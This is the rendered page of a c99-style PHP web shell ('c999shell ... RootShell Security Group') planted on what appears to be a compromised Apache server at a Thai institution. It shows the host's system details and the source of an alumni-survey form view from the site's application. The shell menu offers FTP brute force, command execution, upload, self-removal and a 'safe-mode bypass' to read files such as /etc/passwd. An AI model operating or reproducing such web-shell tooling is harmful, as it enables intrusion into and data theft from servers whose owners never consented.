!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/ealumni/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_settimeForQn.php (2.5 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$row_sqn 
= (isset($qu_sqn) && $qu_sqn!=NULL) ? $qu_sqn->row() : NULL;
?>
<table width="100%">
    <tr>
        <td><?php echo form_open($this->config->item("ea_folder")."query/setqn_save", array("name" => "myform""id" => "myform"));?>
                <table width="100%">
                    <tr>
                        <td align="center" class="h">
                        กำหนดเงื่อนไขการตอบแบบสอบถามข้อมูลการทำงานของผู้สำเร็จการศึกษา</td>
                    </tr>
                    <tr>
                        <td><br /></td>
                    </tr>
                    <tr>
                        <td ><table class="easzone">
                            <tr bgcolor="<?php echo $tr_color_even;?>">
                                <td class="coltd_easzone">วันที่เริ่มต้น</td>            
                                <td>
                                <?    //if(($oTq->startDate == '0000-00-00') ||  ($oTq->startDate =="")) {?> <script>DateInput('startDate', true, 'DD/MM/YYYY','<?php echo getNowDateFw2();?>');</script><? //} else {?> <script>DateInput('startDate', true, 'DD/MM/YYYY','<?php echo splitDateDb($oTq->startDate,"/");?>');</script><? // } ?>
                                </td>
                            </tr> 
                            <tr bgcolor="<?php echo $tr_color_even;?>">
                                <td class="coltd_easzone">วันที่สิ้นสุด</td>            
                                <td><?    //if(($oTq->endDate == '0000-00-00') ||  ($oTq->endDate =="")) {?> <script>DateInput('endDate', true, 'DD/MM/YYYY','<?php echo getNowDateFw2();?>');</script><? //} else {?> <script>DateInput('endDate', true, 'DD/MM/YYYY','<?php echo splitDateDb($oTq->endDate,"/");?>');</script><?  //} ?>
                                </td>            
                            </tr>
                            <tr bgcolor="<?php echo $tr_color_even;?>">
                                <td class="coltd_easzone">ปีการศึกษา</td>            
                                <td><input type="text" name="yearQn" id="yearQn" value="<?php echo set_Value('yearQn');?>" size="10" />
                                <font color="<?php echo $this->config->item('font_color_err');?>" size="2">*</font>
                                <?php echo form_error('yearQn',$row_sqn);?>
                                </td>            
                            </tr>
                            <tr bgcolor="<?php echo $tr_color_even;?>">
                                <td align="center" colspan="5"><input type="submit" name="add" value="บันทึก">
                                <input type="reset" name="clear" value="ลบข้อมูล">
                                <input type="hidden" name="method" value="edit">
                                <input type="hidden" name="seqId" value="1">
                                </td>            
                             </tr>
                        </table></td>
                    </tr>
                    <tr>
                        <td colspan="2"   align="center"></td>
                    </tr>
                </table> 
            <?php echo form_close();?>
        </div></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0172 ]--